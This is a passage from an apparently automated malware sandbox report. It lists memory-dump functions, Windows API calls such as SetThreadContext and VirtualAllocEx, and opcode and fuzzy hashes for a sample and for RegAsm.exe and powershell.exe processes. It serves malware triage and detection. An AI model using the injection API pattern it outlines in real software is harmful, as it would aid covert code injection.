                                • Instruction Fuzzy Hash: 032119B1D0021A9FDB00CF99D884BDEFBB4FB48224F04822AE558A3240D774A945CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 07939CF0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                Download Yara Rule
                                APIs
                                • SetThreadContext.KERNELBASE(?,00000000), ref: 07939D6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: ContextThread
                                • String ID:
                                • API String ID: 1591575202-0
                                • Opcode ID: 9bff1154b4164f6026dca0cea278f1d147df964d298d3bb3615376305d2b7f07
                                • Instruction ID: 8a7e6702a09688061f99c86cb4f18ff0d1ceb2cd89d8dd72547f0f87ced29b31
                                • Opcode Fuzzy Hash: 9bff1154b4164f6026dca0cea278f1d147df964d298d3bb3615376305d2b7f07
                                • Instruction Fuzzy Hash: F12129B1D043098FDB10DFAAC4857EFBBF4EF48268F148429D559A7240CBB8A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793A7E8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0793A86B
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: EnumProcesses
                                • String ID:
                                • API String ID: 84517404-0
                                • Opcode ID: 18e8335cee8a3e202bb4ebd8a5a2f3925363a2113c369e5951a57c2c108bcc54
                                • Instruction ID: fac489df3ae7541a120104ac6e14f98d0d54f20787f832a9a9ea631449b375df
                                • Opcode Fuzzy Hash: 18e8335cee8a3e202bb4ebd8a5a2f3925363a2113c369e5951a57c2c108bcc54
                                • Instruction Fuzzy Hash: 332107B1D002199FDB00CF9AC884BDEFBF4FB48314F04812AE518B3240D778A945CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793B878, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • EnumChildWindows.USER32(?,00000000,?), ref: 0793B8F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: ChildEnumWindows
                                • String ID:
                                • API String ID: 3555792229-0
                                • Opcode ID: 36232769db79ae07a8726e9a3c02c7d7799ba827e91717774954839f5d679e6b
                                • Instruction ID: 5f14b4a685db543102f8f56b0aacea3f048aa234058c707d8cb533493dbc478e
                                • Opcode Fuzzy Hash: 36232769db79ae07a8726e9a3c02c7d7799ba827e91717774954839f5d679e6b
                                • Instruction Fuzzy Hash: 092115B1D002198FDB14CF9AC844BEEFBF5EF88314F14842AE459A3250C778A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793AD10, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0793AD83
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: EnumModulesProcess
                                • String ID:
                                • API String ID: 1082081703-0
                                • Opcode ID: 34d2c70b322a4a3c82e69ada0917e86d933d3ab936c6e090e468163e4f95cd8f
                                • Instruction ID: d4ee62efd94de6fe74a81e05a2f43eb77d912a02ba7c8bdf2a3bee4c4dc9d5ce
                                • Opcode Fuzzy Hash: 34d2c70b322a4a3c82e69ada0917e86d933d3ab936c6e090e468163e4f95cd8f
                                • Instruction Fuzzy Hash: B32114B5D002099FCB10DF9AC484BDEBBF4FF48324F148429E568A7240D778AA45CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 07939E58, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07939EC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 41e0362df303ccbf5f5265013cfbcb58feea4a9336231b6da4f11f9d3cbe0d49
                                • Instruction ID: 743f36abb69eb94fd2b959ec6510bcdba772f4b3b491e610ef2e5608cdd174fe
                                • Opcode Fuzzy Hash: 41e0362df303ccbf5f5265013cfbcb58feea4a9336231b6da4f11f9d3cbe0d49
                                • Instruction Fuzzy Hash: FC1137B59042499FCF10DFAAC844BDFBBF5EF48324F148819D565A7250C7B5A944CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793B368, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0793BFCD
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: c1fabbc7a370f9ddceeb095917f8c86cf6bab2cc07d8a02549a669c202e9827f
                                • Instruction ID: 32609d2115ea5df3811eed27f573f86c9836f10cf1b5f5b99fce6cc6b583be60
                                • Opcode Fuzzy Hash: c1fabbc7a370f9ddceeb095917f8c86cf6bab2cc07d8a02549a669c202e9827f
                                • Instruction Fuzzy Hash: 8F1103B58043499FCB50DF99C889BDEBBF8FB48324F108419E914B7200C3B4A984CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F419F9, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 04F41A5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: 5b0b90e36f214e11fb5a331182dbf0f3376744b7ae48befd83e1f67478c56b83
                                • Instruction ID: 61988de2650e9df88fbd98a7371d525f98420e9719c786609291437876866f3a
                                • Opcode Fuzzy Hash: 5b0b90e36f214e11fb5a331182dbf0f3376744b7ae48befd83e1f67478c56b83
                                • Instruction Fuzzy Hash: 521103B58002498FDB10CF99D588BDFBBF4EB89324F14851AD868B7341C3B4A945CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F41A00, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 04F41A5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: a0cbbf5fe1b8569339c7978cc26ba486dc349e1f3b196d7b7de3a72029ad4e43
                                • Instruction ID: fce837c10e07bbb0bb27a5fc6c233bb33dee798e12583663b800e3fb410932c6
                                • Opcode Fuzzy Hash: a0cbbf5fe1b8569339c7978cc26ba486dc349e1f3b196d7b7de3a72029ad4e43
                                • Instruction Fuzzy Hash: 2611D3B58002499FDB10DF99D588BDFBBF8EB88324F14851AD969B7240C3B4A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 04F40040, Relevance: .3, Instructions: 315COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9dd7e05a22b66e3193a266c6aed689ec13f07a2f039d1f61c00dd52c54afe500
                                • Instruction ID: fcc10f9555d2e074647c83bff27d0f483922597eaeeb7d07d7a664c520444b84
                                • Opcode Fuzzy Hash: 9dd7e05a22b66e3193a266c6aed689ec13f07a2f039d1f61c00dd52c54afe500
                                • Instruction Fuzzy Hash: 1212C9B1611F46CAD710CF55FC8838A3BA1B745328F904308DA699BBF9D7B8254ACF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F40026, Relevance: .2, Instructions: 227COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2767195b1326a312ced977eee5adcdeab3f9a135f51a5f24cd069ac8b1b8797
                                • Instruction ID: 18643946a1bbd968c892a5823282f6a4a7c8f845506958b02ead336ebd612746
                                • Opcode Fuzzy Hash: b2767195b1326a312ced977eee5adcdeab3f9a135f51a5f24cd069ac8b1b8797
                                • Instruction Fuzzy Hash: 45C11DB1A11B45CAD710DF65FC8838A3B71BB85328F504309D969AB7E8D7B8244ACF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: RegAsm.exe PID: 6732 Parent PID: 3736 RegAsm.exeCOMMON

                                Executed Functions

                                Function 06A20DB0, Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.942385928.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b04f776d642b08bd375721d3342e5bf8525545be0cc0e0904e838d0f92ad4f50
                                • Instruction ID: 6464bf07d5160c72271f38b780f263fae67d333f3bbaa42fe472e6aabb38fddb
                                • Opcode Fuzzy Hash: b04f776d642b08bd375721d3342e5bf8525545be0cc0e0904e838d0f92ad4f50
                                • Instruction Fuzzy Hash: 0851AC71D05259DFDB10EFA9D884ADEFBF4FF49310F10816AE918A7244D7309918CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0619A2D0, Relevance: .1, Instructions: 139COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939785799.0000000006190000.00000040.00000001.sdmp, Offset: 06190000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da236de599c2c75c69222585dd57b009b42982993898b112c1e236ee88d5b614
                                • Instruction ID: 9c105692cea8b618c39aca19b92622cb98c05947443e3c89eccab869b4c06bec
                                • Opcode Fuzzy Hash: da236de599c2c75c69222585dd57b009b42982993898b112c1e236ee88d5b614
                                • Instruction Fuzzy Hash: CB510374E15208EFCB44DFA4D998AADBBB2FB89300F108069E905A7364DB34AE45CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECB6CF, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 00ECB730
                                • GetCurrentThread.KERNEL32 ref: 00ECB76D
                                • GetCurrentProcess.KERNEL32 ref: 00ECB7AA
                                • GetCurrentThreadId.KERNEL32 ref: 00ECB803
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 0e047e5dc77a0d73f9096d17c5df9d1238d69952052ccf311df736cf1d06c720
                                • Instruction ID: 8151a507840d985deebc4b62b7d5d46b292cb49a7e9c8bd7fccf3128ac59bc28
                                • Opcode Fuzzy Hash: 0e047e5dc77a0d73f9096d17c5df9d1238d69952052ccf311df736cf1d06c720
                                • Instruction Fuzzy Hash: BE5153B4D002488FDB14CFA9D689B9EBBF0BB88304F20856AE419B7350C7B59945CF65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECB6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 00ECB730
                                • GetCurrentThread.KERNEL32 ref: 00ECB76D
                                • GetCurrentProcess.KERNEL32 ref: 00ECB7AA
                                • GetCurrentThreadId.KERNEL32 ref: 00ECB803
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: c72845b5c288590783dec2cb63754332e2a47443564092045a9c10fe6a24a5ff
                                • Instruction ID: d7eebfa34054e51b5b3abbd43b714b7c5e7fb7383044f02d74acce4d113dd990
                                • Opcode Fuzzy Hash: c72845b5c288590783dec2cb63754332e2a47443564092045a9c10fe6a24a5ff
                                • Instruction Fuzzy Hash: 585154B4D002488FDB14CFA9D689B9EBBF0BF88304F20856AE419B7350C7B59945CF65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECFAA0, Relevance: 1.8, APIs: 1, Instructions: 287COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1832e9acb82934cd81e8d0ae5de59f37554b71fc217055e360af380bb9488bf
                                • Instruction ID: 79e6d87194c3178f349e01a14f9befcbd351330ca1df8600ff15b34514f88c76
                                • Opcode Fuzzy Hash: f1832e9acb82934cd81e8d0ae5de59f37554b71fc217055e360af380bb9488bf
                                • Instruction Fuzzy Hash: ECA180719093889FCB16CFA5C951ACDBFB1FF4A304F1981AAE448AF262C7359846CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00EC93E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EC962E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: cb311316866387953e425fe0d48a3ad62e4a2cef9fbd9bf6667c6a8495c325c8
                                • Instruction ID: f637cd282f1b90eb7f542feeeea56d5eb6f82f75972157de9ffe0a6153ea9ab1
                                • Opcode Fuzzy Hash: cb311316866387953e425fe0d48a3ad62e4a2cef9fbd9bf6667c6a8495c325c8
                                • Instruction Fuzzy Hash: 5F713770A00B058FD724CF29C585B5AB7F1BF88304F10892EE49AD7A51DB75E906CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ECFD0A
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: a8dbb5919fa72bd2569eadef3f751d089abde9feaeb356ca3d81b26f7d707700
                                • Instruction ID: 8471f141b59b8ad528486cb11c5733d5030b8d4262a8708e76989b0ba47e4a07
                                • Opcode Fuzzy Hash: a8dbb5919fa72bd2569eadef3f751d089abde9feaeb356ca3d81b26f7d707700
                                • Instruction Fuzzy Hash: F941AEB1D003099FDF14CF9AC984ADEBFB6BF88314F24812AE819AB250D7759945CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 06A24B54, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000D.00000002.942385928.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 89dd31b9c72ed59c521517eb01d8ff4fae28b18ccb9f7a4ff7ff5d1eeadeb1e2
                                • Instruction ID: bc6f7a7686d3412133deda07dce1bf61cc0d9c6434c0b1d99730440ac496a28b
                                • Opcode Fuzzy Hash: 89dd31b9c72ed59c521517eb01d8ff4fae28b18ccb9f7a4ff7ff5d1eeadeb1e2
                                • Instruction Fuzzy Hash: EA3153B0D0026A8FDB54DFADC885B9EBBF1FB08314F14852AE815AB380DB749585CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECBCFF, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ECBD87
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: f282babbf976df9d8b7da6cae04710f1efccd9047305006a7ae3ada927f0e92a
                                • Instruction ID: 94303a3ea5142c0d4423cbf27a034b6d7adbeba4410556a41130daa203ddec7f
                                • Opcode Fuzzy Hash: f282babbf976df9d8b7da6cae04710f1efccd9047305006a7ae3ada927f0e92a
                                • Instruction Fuzzy Hash: 7A21E0B59002499FDB10CFAAD484BDEBFF4EB48314F14802AE918A7310D378A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ECBD87
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: e57fb89f0c2e239dbac5eb5c8af21f7cbfecc5084e1208aad56280660d256247
                                • Instruction ID: 10b787593adf6096810946c5c98de7c368f6f6ad95e805591290025af6e85200
                                • Opcode Fuzzy Hash: e57fb89f0c2e239dbac5eb5c8af21f7cbfecc5084e1208aad56280660d256247
                                • Instruction Fuzzy Hash: 3021E0B59002499FDB10CFAAD884BDEBBF4EB48314F14802AE918A3310D378A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00EC8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EC96A9,00000800,00000000,00000000), ref: 00EC98BA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: e4fd28b0d668f11ac36170a665c00cd6c640eae06145e06d11e26e79444fab28
                                • Instruction ID: 71ff8d79a6d2fc86899333f151e291e02f22e4e9f1348f02daf53d3575e70ffc
                                • Opcode Fuzzy Hash: e4fd28b0d668f11ac36170a665c00cd6c640eae06145e06d11e26e79444fab28
                                • Instruction Fuzzy Hash: 731100B69002498FDB14CF9AC448BDEFBF4EB89314F14842EE919B7600C3B5A945CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00EC984F, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EC96A9,00000800,00000000,00000000), ref: 00EC98BA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: a273bcb90cd98e78ca53cc3bf2bf9177b5227e7c025ea1f39f3f3feffc2a7c03
                                • Instruction ID: f4a9a73a2526352bde8b40a014a2cbafc15fa8a6dcb42c006978e8e9af82393c
                                • Opcode Fuzzy Hash: a273bcb90cd98e78ca53cc3bf2bf9177b5227e7c025ea1f39f3f3feffc2a7c03
                                • Instruction Fuzzy Hash: 5B11D3B69002498FDB14CF9AD448BDEFBF4EB89314F14842ED419B7600C3B5A545CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECFE38, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 00ECFE9D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: 1d6558453c91f0298cd8b9bdebb1924c84c7a9d2224f632740c17fb2d656e755
                                • Instruction ID: 7b21e41d5a37f441c5e60b5f43b1dfb40c755c8b3b35fbd93d1a9b6d1fd723f0
                                • Opcode Fuzzy Hash: 1d6558453c91f0298cd8b9bdebb1924c84c7a9d2224f632740c17fb2d656e755
                                • Instruction Fuzzy Hash: 451128B58002488FCB10CF99D585BDEFBF4EB48324F20842AD954B3700C375A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00EC95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EC962E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 81cd8603ea16a19e3b93c8480afc4e4853a1499ce52f3e6239c4d4bc94489470
                                • Instruction ID: 7300f160606d37de8e195431af19af24ee888ba45902fd228321d82708ae8579
                                • Opcode Fuzzy Hash: 81cd8603ea16a19e3b93c8480afc4e4853a1499ce52f3e6239c4d4bc94489470
                                • Instruction Fuzzy Hash: 2D11E0B5C006498FCB10CF9AC448BDEFBF4EB89314F14852AD869B7640D3B9A546CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00ECFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 00ECFE9D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: a4a9edf250270e05db7b77e5e4384d1db6461a49b922b5be226ab26e593e062f
                                • Instruction ID: 36d366dcf22b389687f3437d1e3324146dcd2a57ff6d234df95cad960d3c4098
                                • Opcode Fuzzy Hash: a4a9edf250270e05db7b77e5e4384d1db6461a49b922b5be226ab26e593e062f
                                • Instruction Fuzzy Hash: E11103B58002498FDB10CF9AD585BDEBBF8EB48324F20841AD818B3300C3B4A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 06230640, Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e052cc68400a84fa9a32b4157d43d9765d5be983f0f549223a81379147d7d93d
                                • Instruction ID: 093bb98f9d8ad94f3e2ca7740b0788f379bbdaa59257c75df5a85e15a33ced7e
                                • Opcode Fuzzy Hash: e052cc68400a84fa9a32b4157d43d9765d5be983f0f549223a81379147d7d93d
                                • Instruction Fuzzy Hash: 3F210431B04A214FC765EA7C981065AB7E6AFC9214305C67ED94ACB794DF31ED0287E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 06230630, Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fda56811bb5ec1f7b9fae7590353a244d26b273b795c37f3e8cf88a61989838d
                                • Instruction ID: 4de24c164fb8bb1d96851290628eb27bfba51e8ad239348ad5072a4d0ebc4d3a
                                • Opcode Fuzzy Hash: fda56811bb5ec1f7b9fae7590353a244d26b273b795c37f3e8cf88a61989838d
                                • Instruction Fuzzy Hash: 55F0AC317083108FC751AB7CAC40496BBFACFC512130446ABE25CCB246DB219D0587F0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 062306C0, Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03987cf9f4b75ee0453aa9a680045a2bd467b31469a4d0239a2c0358c85f2fb5
                                • Instruction ID: e48040b6ac646d7ffc85d541a7ee44475d0144ea2e8529433e79c03caa5b402f
                                • Opcode Fuzzy Hash: 03987cf9f4b75ee0453aa9a680045a2bd467b31469a4d0239a2c0358c85f2fb5
                                • Instruction Fuzzy Hash: ACF02B72B50E314B8378DA688C00A5772EA9F88210704863DD445CB754EF31EC4287E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 06230778, Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15932f4657bfb4a9b715eccfeba605f4b4db3a161785edf08d52e45df89896f5
                                • Instruction ID: 32ba1a5369a41c102cd30481dcc0c78fac6056276f4782222df5215d7e747363
                                • Opcode Fuzzy Hash: 15932f4657bfb4a9b715eccfeba605f4b4db3a161785edf08d52e45df89896f5
                                • Instruction Fuzzy Hash: 06E0D8767046204FD314EE54A454A9E37B3AB89310305469AED8AC7291CB388E06C7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 06230788, Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88be9caad3d340b5055d9a245595ecf8cb5e5bb58932217b1e43d641a0a15cef
                                • Instruction ID: 7bc94cae6b8a92b8287dd06f8336b0218384d3beea29673b8dc3d487b2acf40a
                                • Opcode Fuzzy Hash: 88be9caad3d340b5055d9a245595ecf8cb5e5bb58932217b1e43d641a0a15cef
                                • Instruction Fuzzy Hash: 15E02B36700A304B9314AE15E4047AF73EBABC81207044329ED0AC3380CF38DE4287F4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0623137A, Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a9eaf4d131b52a7cd90f191a2bafd73b24bbbb890ac5146e11f56078b908a1f
                                • Instruction ID: 6a6ac35cd2603bd1a1571ccaf4b6c55313ea61f5c96a03d9ba14a4582c7bcc66
                                • Opcode Fuzzy Hash: 9a9eaf4d131b52a7cd90f191a2bafd73b24bbbb890ac5146e11f56078b908a1f
                                • Instruction Fuzzy Hash: EEE0DFB8C18219AEC780EFB888507EFBFF87F08200F108569C559E7301EB7002068FA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 06231388, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 866b9cf389f74c9517437dae4c4b1faeaea08c24c47a0507d8131e2e5965aff3
                                • Instruction ID: 94d7cc590fa36851a4278aab4a9b2412e94484a75e2004d975275e76a2b331de
                                • Opcode Fuzzy Hash: 866b9cf389f74c9517437dae4c4b1faeaea08c24c47a0507d8131e2e5965aff3
                                • Instruction Fuzzy Hash: 1BE0ECB0D142199ED780EFA8C4157DEBBF4BB04204F108969C419E6641E7B446058F91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: powershell.exe PID: 6860 Parent PID: 6464 powershell.exeCOMMON

                                Executed Functions

                                Function 079DE4E8, Relevance: .3, Instructions: 294COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7e24e38c0235dcb2aaf9d8927c0d2ca8c4eb5b5df9b535c31ee24063dd456e1
                                • Instruction ID: 186fcda0fc7f6421f2791cc25b7aae09242838b1c0e29c4206ec2a2285471af6
                                • Opcode Fuzzy Hash: a7e24e38c0235dcb2aaf9d8927c0d2ca8c4eb5b5df9b535c31ee24063dd456e1
